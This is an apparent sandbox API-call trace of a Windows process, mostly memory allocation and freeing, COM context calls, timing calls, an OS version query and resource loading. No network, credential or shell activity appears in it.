	[0112.574] realloc (_Block=0x0, _Size=0x2ac) returned 0x372090
	[0112.574] ??2@YAPEAX_K@Z () returned 0x372090
	[0112.575] free (_Block=0x3719b0) 
	[0112.576] ??2@YAPEAX_K@Z () returned 0x3719b0
	[0112.576] ??2@YAPEAX_K@Z () returned 0x371a60
	[0113.095] ??2@YAPEAX_K@Z () returned 0x371b10
	[0113.095] ??2@YAPEAX_K@Z () returned 0x372b10
	[0113.095] malloc (_Size=0x80) returned 0x371bc0
	[0113.095] malloc (_Size=0x108) returned 0x558820
	[0113.096] ??2@YAPEAX_K@Z () returned 0x374ae0
	[0113.097] ??2@YAPEAX_K@Z () returned 0x374b10
	[0113.097] ??2@YAPEAX_K@Z () returned 0x374b40
	[0113.098] ??2@YAPEAX_K@Z () returned 0x374b70
	[0113.098] ??2@YAPEAX_K@Z () returned 0x374ba0
	[0113.098] ??2@YAPEAX_K@Z () returned 0x374bd0
	[0113.099] ??2@YAPEAX_K@Z () returned 0x375550
	[0113.099] ??2@YAPEAX_K@Z () returned 0x375580
	[0113.100] ??2@YAPEAX_K@Z () returned 0x3755b0
	[0113.100] ??2@YAPEAX_K@Z () returned 0x3755e0
	[0113.101] ??2@YAPEAX_K@Z () returned 0x375610
	[0113.102] ??2@YAPEAX_K@Z () returned 0x375640
	[0113.102] ??2@YAPEAX_K@Z () returned 0x375670
	[0113.103] ??2@YAPEAX_K@Z () returned 0x3756a0
	[0113.104] ??2@YAPEAX_K@Z () returned 0x3756d0
	[0113.104] ??2@YAPEAX_K@Z () returned 0x375700
	[0113.105] ??2@YAPEAX_K@Z () returned 0x375730
	[0113.106] ??2@YAPEAX_K@Z () returned 0x375790
	[0113.106] ??2@YAPEAX_K@Z () returned 0x3757c0
	[0113.107] ??2@YAPEAX_K@Z () returned 0x3757f0
	[0113.108] ??2@YAPEAX_K@Z () returned 0x375820
	[0113.109] ??2@YAPEAX_K@Z () returned 0x375850
	[0113.109] ??2@YAPEAX_K@Z () returned 0x375880
	[0113.110] ??2@YAPEAX_K@Z () returned 0x3758b0
	[0113.111] ??2@YAPEAX_K@Z () returned 0x3758e0
	[0113.112] ??2@YAPEAX_K@Z () returned 0x375910
	[0113.112] ??2@YAPEAX_K@Z () returned 0x375940
	[0113.113] ??2@YAPEAX_K@Z () returned 0x375970
	[0113.114] ??2@YAPEAX_K@Z () returned 0x3759a0
	[0113.114] ??2@YAPEAX_K@Z () returned 0x3759d0
	[0113.115] ??2@YAPEAX_K@Z () returned 0x375a00
	[0113.116] ??2@YAPEAX_K@Z () returned 0x375a30
	[0113.116] ??2@YAPEAX_K@Z () returned 0x375a60
	[0113.117] ??2@YAPEAX_K@Z () returned 0x375a90
	[0113.118] ??2@YAPEAX_K@Z () returned 0x375ac0
	[0113.119] ??2@YAPEAX_K@Z () returned 0x375af0
	[0113.119] ??2@YAPEAX_K@Z () returned 0x375f60
	[0113.120] ??2@YAPEAX_K@Z () returned 0x375b20
	[0113.121] ??2@YAPEAX_K@Z () returned 0x375b50
	[0113.121] ??2@YAPEAX_K@Z () returned 0x375b80
	[0113.122] ??2@YAPEAX_K@Z () returned 0x375bb0
	[0113.123] ??2@YAPEAX_K@Z () returned 0x375be0
	[0113.124] ??2@YAPEAX_K@Z () returned 0x375c10
	[0113.124] ??2@YAPEAX_K@Z () returned 0x375c40
	[0113.125] ??2@YAPEAX_K@Z () returned 0x375c70
	[0113.126] ??2@YAPEAX_K@Z () returned 0x375ca0
	[0113.126] ??2@YAPEAX_K@Z () returned 0x375cd0
	[0113.127] ??2@YAPEAX_K@Z () returned 0x375d00
	[0113.128] ??2@YAPEAX_K@Z () returned 0x375d30
	[0113.128] ??2@YAPEAX_K@Z () returned 0x375d60
	[0113.576] ??2@YAPEAX_K@Z () returned 0x375d90
	[0113.577] ??2@YAPEAX_K@Z () returned 0x375dc0
	[0113.578] ??2@YAPEAX_K@Z () returned 0x375df0
	[0113.578] ??2@YAPEAX_K@Z () returned 0x375e20
	[0113.579] ??2@YAPEAX_K@Z () returned 0x375e50
	[0113.580] ??2@YAPEAX_K@Z () returned 0x375e80
	[0113.581] ??2@YAPEAX_K@Z () returned 0x375eb0
	[0113.581] ??2@YAPEAX_K@Z () returned 0x375ee0
	[0113.582] ??2@YAPEAX_K@Z () returned 0x375f10
	[0113.583] ??2@YAPEAX_K@Z () returned 0x376910
	[0113.583] ??2@YAPEAX_K@Z () returned 0x376940
	[0113.584] ??2@YAPEAX_K@Z () returned 0x376970
	[0113.585] ??2@YAPEAX_K@Z () returned 0x3769a0
	[0113.586] ??2@YAPEAX_K@Z () returned 0x3769d0
	[0113.586] ??2@YAPEAX_K@Z () returned 0x376a00
	[0113.587] ??2@YAPEAX_K@Z () returned 0x376a30
	[0113.588] ??2@YAPEAX_K@Z () returned 0x376a60
	[0113.588] ??2@YAPEAX_K@Z () returned 0x3770e0
	[0113.589] ??2@YAPEAX_K@Z () returned 0x376a90
	[0113.590] ??2@YAPEAX_K@Z () returned 0x376ac0
	[0113.590] ??2@YAPEAX_K@Z () returned 0x376af0
	[0113.592] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x147568 | out: ppv=0x147568*=0x27f420) returned 0x0
	[0113.593] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.593] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] free (_Block=0x371c70) 
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] free (_Block=0x55ea80) 
	[0113.594] free (_Block=0x370930) 
	[0113.594] free (_Block=0x5583e0) 
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] free (_Block=0x371e20) 
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] free (_Block=0x55ffb0) 
	[0113.594] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.594] free (_Block=0x3b1140) 
	[0113.595] free (_Block=0x557d80) 
	[0113.595] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.595] ??3@YAXPEAX@Z () returned 0x46511f01
	[0113.595] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0113.595] IUnknown:Release (This=0x27f420) returned 0x1
	[0113.595] GetTickCount () returned 0x2ccfe
	[0113.595] ??2@YAPEAX_K@Z () returned 0x376b20
	[0113.596] ??2@YAPEAX_K@Z () returned 0x376b50
	[0113.597] ??2@YAPEAX_K@Z () returned 0x376b80
	[0113.597] ??2@YAPEAX_K@Z () returned 0x376bb0
	[0113.598] ??2@YAPEAX_K@Z () returned 0x376be0
	[0113.599] ??2@YAPEAX_K@Z () returned 0x376c10
	[0113.600] ??2@YAPEAX_K@Z () returned 0x376c40
	[0113.600] ??2@YAPEAX_K@Z () returned 0x376c70
	[0113.601] ??2@YAPEAX_K@Z () returned 0x376ca0
	[0113.602] ??2@YAPEAX_K@Z () returned 0x376cd0
	[0113.602] ??2@YAPEAX_K@Z () returned 0x376d00
	[0113.603] ??2@YAPEAX_K@Z () returned 0x376d30
	[0113.604] ??2@YAPEAX_K@Z () returned 0x376d60
	[0113.604] ??2@YAPEAX_K@Z () returned 0x376d90
	[0113.605] ??2@YAPEAX_K@Z () returned 0x376dc0
	[0113.606] ??2@YAPEAX_K@Z () returned 0x376df0
	[0113.607] ??2@YAPEAX_K@Z () returned 0x376e20
	[0113.998] ??2@YAPEAX_K@Z () returned 0x376e50
	[0113.999] ??2@YAPEAX_K@Z () returned 0x376e80
	[0113.999] ??2@YAPEAX_K@Z () returned 0x376eb0
	[0114.000] ??2@YAPEAX_K@Z () returned 0x376ee0
	[0114.001] ??2@YAPEAX_K@Z () returned 0x376f10
	[0114.001] ??2@YAPEAX_K@Z () returned 0x376f40
	[0114.002] ??2@YAPEAX_K@Z () returned 0x376f70
	[0114.003] ??2@YAPEAX_K@Z () returned 0x376fa0
	[0114.003] ??2@YAPEAX_K@Z () returned 0x376fd0
	[0114.004] ??2@YAPEAX_K@Z () returned 0x377000
	[0114.005] ??2@YAPEAX_K@Z () returned 0x377030
	[0114.005] ??2@YAPEAX_K@Z () returned 0x377060
	[0114.006] ??2@YAPEAX_K@Z () returned 0x377090
	[0114.007] ??2@YAPEAX_K@Z () returned 0x377a90
	[0114.008] ??2@YAPEAX_K@Z () returned 0x377ac0
	[0114.008] ??2@YAPEAX_K@Z () returned 0x377af0
	[0114.009] ??2@YAPEAX_K@Z () returned 0x377b20
	[0114.010] ??2@YAPEAX_K@Z () returned 0x377b50
	[0114.010] ??2@YAPEAX_K@Z () returned 0x377b80
	[0114.011] ??2@YAPEAX_K@Z () returned 0x377bb0
	[0114.012] ??2@YAPEAX_K@Z () returned 0x377be0
	[0114.013] ??2@YAPEAX_K@Z () returned 0x377c10
	[0114.013] ??2@YAPEAX_K@Z () returned 0x377c40
	[0114.014] ??2@YAPEAX_K@Z () returned 0x377c70
	[0114.015] ??2@YAPEAX_K@Z () returned 0x377ca0
	[0114.015] ??2@YAPEAX_K@Z () returned 0x377cd0
	[0114.016] ??2@YAPEAX_K@Z () returned 0x377d00
	[0114.017] ??2@YAPEAX_K@Z () returned 0x377d30
	[0114.018] ??2@YAPEAX_K@Z () returned 0x377d60
	[0114.018] ??2@YAPEAX_K@Z () returned 0x377d90
	[0114.019] ??2@YAPEAX_K@Z () returned 0x377dc0
	[0114.020] ??2@YAPEAX_K@Z () returned 0x377df0
	[0114.020] ??2@YAPEAX_K@Z () returned 0x377e20
	[0114.021] ??2@YAPEAX_K@Z () returned 0x377e50
	[0114.022] ??2@YAPEAX_K@Z () returned 0x377e80
	[0114.022] ??2@YAPEAX_K@Z () returned 0x377eb0
	[0114.023] ??2@YAPEAX_K@Z () returned 0x377ee0
	[0114.024] ??2@YAPEAX_K@Z () returned 0x377f10
	[0114.024] ??2@YAPEAX_K@Z () returned 0x377f40
	[0114.025] ??2@YAPEAX_K@Z () returned 0x377f70
	[0114.026] ??2@YAPEAX_K@Z () returned 0x377fa0
	[0114.027] ??2@YAPEAX_K@Z () returned 0x372bc0
	[0114.027] malloc (_Size=0x208) returned 0x3b1090
	[0114.029] ??2@YAPEAX_K@Z () returned 0x370e90
	[0114.029] ??2@YAPEAX_K@Z () returned 0x3b2bf0
	[0114.030] ??2@YAPEAX_K@Z () returned 0x370880
	[0114.030] ??2@YAPEAX_K@Z () returned 0x372c70
	[0114.030] ??2@YAPEAX_K@Z () returned 0x372d20
	[0114.030] malloc (_Size=0x80) returned 0x370910
	[0114.030] malloc (_Size=0x108) returned 0x557d80
	[0114.031] ??2@YAPEAX_K@Z () returned 0x372dd0
	[0114.031] malloc (_Size=0x80) returned 0x370a90
	[0114.031] malloc (_Size=0x108) returned 0x5583e0
	[0114.032] ??2@YAPEAX_K@Z () returned 0x378260
	[0114.033] ??2@YAPEAX_K@Z () returned 0x377fa0
	[0114.034] ??2@YAPEAX_K@Z () returned 0x372e80
	[0114.035] ??2@YAPEAX_K@Z () returned 0x377fa0
	[0114.035] ??2@YAPEAX_K@Z () returned 0x377fd0
	[0114.036] ??2@YAPEAX_K@Z () returned 0x377fd0
	[0114.037] ??2@YAPEAX_K@Z () returned 0x378000
	[0114.038] ??2@YAPEAX_K@Z () returned 0x378030
	[0114.038] ??2@YAPEAX_K@Z () returned 0x378030
	[0114.039] ??2@YAPEAX_K@Z () returned 0x378060
	[0114.040] ??2@YAPEAX_K@Z () returned 0x378090
	[0114.040] ??2@YAPEAX_K@Z () returned 0x378090
	[0114.041] ??2@YAPEAX_K@Z () returned 0x3780c0
	[0114.042] ??2@YAPEAX_K@Z () returned 0x3780f0
	[0114.042] ??2@YAPEAX_K@Z () returned 0x3780f0
	[0114.043] ??2@YAPEAX_K@Z () returned 0x378120
	[0114.044] ??2@YAPEAX_K@Z () returned 0x378150
	[0114.389] ??2@YAPEAX_K@Z () returned 0x3793e0
	[0114.390] ??2@YAPEAX_K@Z () returned 0x379d60
	[0114.391] ??2@YAPEAX_K@Z () returned 0x37aee0
	[0114.392] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0114.393] ??3@YAXPEAX@Z () returned 0x1
	[0114.393] ??3@YAXPEAX@Z () returned 0xb00500001
	[0114.393] ??3@YAXPEAX@Z () returned 0xc004d0001
	[0114.393] ??3@YAXPEAX@Z () returned 0xd004a0001
	[0114.393] ??3@YAXPEAX@Z () returned 0xe00470001
	[0114.393] ??3@YAXPEAX@Z () returned 0xf00440001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1000410001
	[0114.394] ??3@YAXPEAX@Z () returned 0x11003e0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x12003b0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1300380001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1400350001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1500320001
	[0114.394] ??3@YAXPEAX@Z () returned 0x16002f0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x17002c0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1800290001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1900260001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1a00230001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1b00200001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1c001d0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1d001a0001
	[0114.394] ??3@YAXPEAX@Z () returned 0x1e00170001
	[0114.395] ??3@YAXPEAX@Z () returned 0x1f00140001
	[0114.395] ??3@YAXPEAX@Z () returned 0x2000110001
	[0114.395] ??3@YAXPEAX@Z () returned 0x21000e0001
	[0114.395] ??3@YAXPEAX@Z () returned 0x1
	[0114.395] ??3@YAXPEAX@Z () returned 0x200200001
	[0114.395] ??3@YAXPEAX@Z () returned 0x3001d0001
	[0114.395] ??3@YAXPEAX@Z () returned 0x22000b0001
	[0114.395] ??3@YAXPEAX@Z () returned 0x4001a0001
	[0114.395] ??3@YAXPEAX@Z () returned 0x500170001
	[0114.395] ??3@YAXPEAX@Z () returned 0x2300080001
	[0114.395] ??3@YAXPEAX@Z () returned 0x600140001
	[0114.395] ??3@YAXPEAX@Z () returned 0x700110001
	[0114.395] ??3@YAXPEAX@Z () returned 0x2400050001
	[0114.395] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0114.395] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0114.395] ??3@YAXPEAX@Z () returned 0xa00080001
	[0114.395] ??3@YAXPEAX@Z () returned 0xb00050001
	[0114.395] ??3@YAXPEAX@Z () returned 0xc007a0001
	[0114.398] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0114.398] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.398] GetTickCount () returned 0x2d01a
	[0114.398] ??2@YAPEAX_K@Z () returned 0x375910
	[0114.400] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0114.401] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0114.401] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.401] GetTickCount () returned 0x2d01a
	[0114.403] ??2@YAPEAX_K@Z () returned 0x383bf0
	[0114.405] ??2@YAPEAX_K@Z () returned 0x372fe0
	[0114.405] malloc (_Size=0x80) returned 0x370b20
	[0114.405] malloc (_Size=0x108) returned 0x558930
	[0114.408] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.410] realloc (_Block=0x0, _Size=0x64) returned 0x374ae0
	[0114.410] realloc (_Block=0x0, _Size=0x27c) returned 0x37caf0
	[0114.412] free (_Block=0x374ae0) 
	[0114.413] ??2@YAPEAX_K@Z () returned 0x384d70
	[0114.414] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x147568 | out: ppv=0x147568*=0x27f420) returned 0x0
	[0114.414] ??3@YAXPEAX@Z () returned 0x46511f01
	[0114.414] ??3@YAXPEAX@Z () returned 0x1
	[0114.415] ??3@YAXPEAX@Z () returned 0x1900050001
	[0114.416] ??3@YAXPEAX@Z () returned 0x3400200001
	[0114.417] free (_Block=0x37ffd0) 
	[0114.417] free (_Block=0x375550) 
	[0114.417] free (_Block=0x3813e0) 
	[0114.417] free (_Block=0x37ebc0) 
	[0114.417] free (_Block=0x37d7a0) 
	[0114.417] free (_Block=0x37cd80) 
	[0114.417] free (_Block=0x37c860) 
	[0114.417] ??3@YAXPEAX@Z () returned 0x46511f01
	[0114.417] ??3@YAXPEAX@Z () returned 0x46511f01
	[0114.417] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0114.418] free (_Block=0x3b1530) 
	[0114.418] ??3@YAXPEAX@Z () returned 0x46511f01
	[0114.418] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0114.418] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.418] GetTickCount () returned 0x2d039
	[0114.420] ??2@YAPEAX_K@Z () returned 0x37ba70
	[0114.421] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0114.421] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0114.421] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.422] GetTickCount () returned 0x2d039
	[0114.422] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0114.423] MulDiv (nNumber=256, nNumerator=100, nDenominator=1084) returned 24
	[0114.423] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.423] GetTickCount () returned 0x2d039
	[0114.425] ??2@YAPEAX_K@Z () returned 0x3834b0
	[0114.427] ??2@YAPEAX_K@Z () returned 0x383840
	[0114.429] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.431] realloc (_Block=0x0, _Size=0x64) returned 0x3b2700
	[0114.431] realloc (_Block=0x0, _Size=0xc8) returned 0x374ae0
	[0114.433] free (_Block=0x3b2700) 
	[0114.597] ??2@YAPEAX_K@Z () returned 0x38a760
	[0114.599] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0114.602] MulDiv (nNumber=723, nNumerator=100, nDenominator=1341) returned 54
	[0114.602] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.602] GetTickCount () returned 0x2d0e5
	[0114.606] malloc (_Size=0x208) returned 0x3b2cf0
	[0114.606] ??2@YAPEAX_K@Z () returned 0x3847e0
	[0114.609] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.613] ??2@YAPEAX_K@Z () returned 0x38aa00
	[0114.615] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.616] MulDiv (nNumber=369, nNumerator=100, nDenominator=1130) returned 33
	[0114.616] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.616] GetTickCount () returned 0x2d0f4
	[0114.618] MulDiv (nNumber=461, nNumerator=100, nDenominator=1275) returned 36
	[0114.618] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.618] GetTickCount () returned 0x2d0f4
	[0114.619] MulDiv (nNumber=256, nNumerator=100, nDenominator=1326) returned 19
	[0114.619] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.619] GetTickCount () returned 0x2d0f4
	[0114.621] ??2@YAPEAX_K@Z () returned 0x382e00
	[0114.623] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.626] MulDiv (nNumber=695, nNumerator=100, nDenominator=1583) returned 44
	[0114.626] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.626] GetTickCount () returned 0x2d104
	[0114.628] ??2@YAPEAX_K@Z () returned 0x375b50
	[0114.630] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.633] MulDiv (nNumber=550, nNumerator=100, nDenominator=1402) returned 39
	[0114.633] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.633] GetTickCount () returned 0x2d104
	[0114.633] MulDiv (nNumber=256, nNumerator=100, nDenominator=1364) returned 19
	[0114.633] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.633] GetTickCount () returned 0x2d104
	[0114.765] ??2@YAPEAX_K@Z () returned 0x376fa0
	[0114.767] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.769] MulDiv (nNumber=604, nNumerator=100, nDenominator=1620) returned 37
	[0114.769] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.769] GetTickCount () returned 0x2d190
	[0114.772] ??2@YAPEAX_K@Z () returned 0x384ba0
	[0114.774] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.778] ??2@YAPEAX_K@Z () returned 0x38a910
	[0114.780] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0114.782] MulDiv (nNumber=489, nNumerator=100, nDenominator=1535) returned 32
	[0114.782] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.782] GetTickCount () returned 0x2d1a0
	[0114.784] malloc (_Size=0x408) returned 0x392c90
	[0114.784] realloc (_Block=0x0, _Size=0xa0) returned 0x373090
	[0114.785] ??2@YAPEAX_K@Z () returned 0x38aa90
	[0114.787] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.789] MulDiv (nNumber=425, nNumerator=100, nDenominator=1559) returned 27
	[0114.789] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.789] GetTickCount () returned 0x2d1a0
	[0114.792] ??2@YAPEAX_K@Z () returned 0x37c0c0
	[0114.800] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.802] MulDiv (nNumber=494, nNumerator=100, nDenominator=1646) returned 30
	[0114.802] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.802] GetTickCount () returned 0x2d1af
	[0114.805] ??2@YAPEAX_K@Z () returned 0x37b950
	[0114.807] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.956] ??2@YAPEAX_K@Z () returned 0x3830d0
	[0114.958] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0114.960] MulDiv (nNumber=494, nNumerator=100, nDenominator=1665) returned 30
	[0114.960] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.961] GetTickCount () returned 0x2d24b
	[0114.963] ??2@YAPEAX_K@Z () returned 0x384900
	[0114.965] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.969] ??2@YAPEAX_K@Z () returned 0x37bb30
	[0114.970] GetVersionExA (in: lpVersionInformation=0x14c5f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x5512f0, dwBuildNumber=0x0, dwPlatformId=0x27e198, szCSDVersion="") | out: lpVersionInformation=0x14c5f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0114.970] FindResourceA (hModule=0x7fee13d0000, lpName=0x139, lpType=0x6) returned 0x2207f8
	[0114.971] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207f8) returned 0x221d44
	[0114.971] LockResource (hResData=0x221d44) returned 0x221d44
	[0114.971] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207f8) returned 0x15c
	[0114.972] FreeResource (hResData=0x221d44) returned 0
	[0114.972] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x2207e8
	[0114.972] LoadResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0x221c74
	[0114.972] LockResource (hResData=0x221c74) returned 0x221c74
	[0114.972] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x2207e8) returned 0xce
	[0114.973] FreeResource (hResData=0x221c74) returned 0
	[0114.973] bsearch (_Key=0x14cf88, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0114.973] ??2@YAPEAX_K@Z () returned 0x3b0a20
	[0114.976] ??2@YAPEAX_K@Z () returned 0x393120
	[0114.978] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0114.978] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.978] GetTickCount () returned 0x2d25b
	[0114.983] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0114.987] ??2@YAPEAX_K@Z () returned 0x37cb30
	[0114.989] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0114.991] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0114.991] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.991] GetTickCount () returned 0x2d26b
	[0114.993] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0114.993] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.993] GetTickCount () returned 0x2d26b
	[0114.994] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0114.994] IUnknown:Release (This=0x27f420) returned 0x1
	[0114.994] GetTickCount () returned 0x2d26b
	[0115.201] ??2@YAPEAX_K@Z () returned 0x395ee0
	[0115.204] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.208] ??2@YAPEAX_K@Z () returned 0x3f3c00
	[0115.211] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.211] GetTickCount () returned 0x2d345
	[0115.211] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.214] realloc (_Block=0x373090, _Size=0x140) returned 0x385720
	[0115.215] ??2@YAPEAX_K@Z () returned 0x37be60
	[0115.217] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.217] GetTickCount () returned 0x2d355
	[0115.218] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.222] ??2@YAPEAX_K@Z () returned 0x39c0c0
	[0115.224] ??2@YAPEAX_K@Z () returned 0x3711a0
	[0115.224] GetTickCount () returned 0x2d355
	[0115.224] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.224] free (_Block=0x3c4410) 
	[0115.224] free (_Block=0x375550) 
	[0115.224] free (_Block=0x398730) 
	[0115.224] free (_Block=0x3c3000) 
	[0115.224] free (_Block=0x3b3000) 
	[0115.224] free (_Block=0x38acc0) 
	[0115.224] free (_Block=0x37e9e0) 
	[0115.224] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.224] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.228] ??2@YAPEAX_K@Z () returned 0x39c300
	[0115.231] ??2@YAPEAX_K@Z () returned 0x393120
	[0115.235] ??2@YAPEAX_K@Z () returned 0x394580
	[0115.238] ??2@YAPEAX_K@Z () returned 0x3b2700
	[0115.238] GetTickCount () returned 0x2d364
	[0115.238] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1492f8 | out: ppv=0x1492f8*=0x27f420) returned 0x0
	[0115.238] free (_Block=0x3c4410) 
	[0115.238] free (_Block=0x375550) 
	[0115.238] free (_Block=0x398730) 
	[0115.238] free (_Block=0x3c3000) 
	[0115.238] free (_Block=0x3b3000) 
	[0115.238] free (_Block=0x38acc0) 
	[0115.238] free (_Block=0x37e9e0) 
	[0115.238] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.238] ??3@YAXPEAX@Z () returned 0x46511f01
	[0115.241] malloc (_Size=0x808) returned 0x395f20
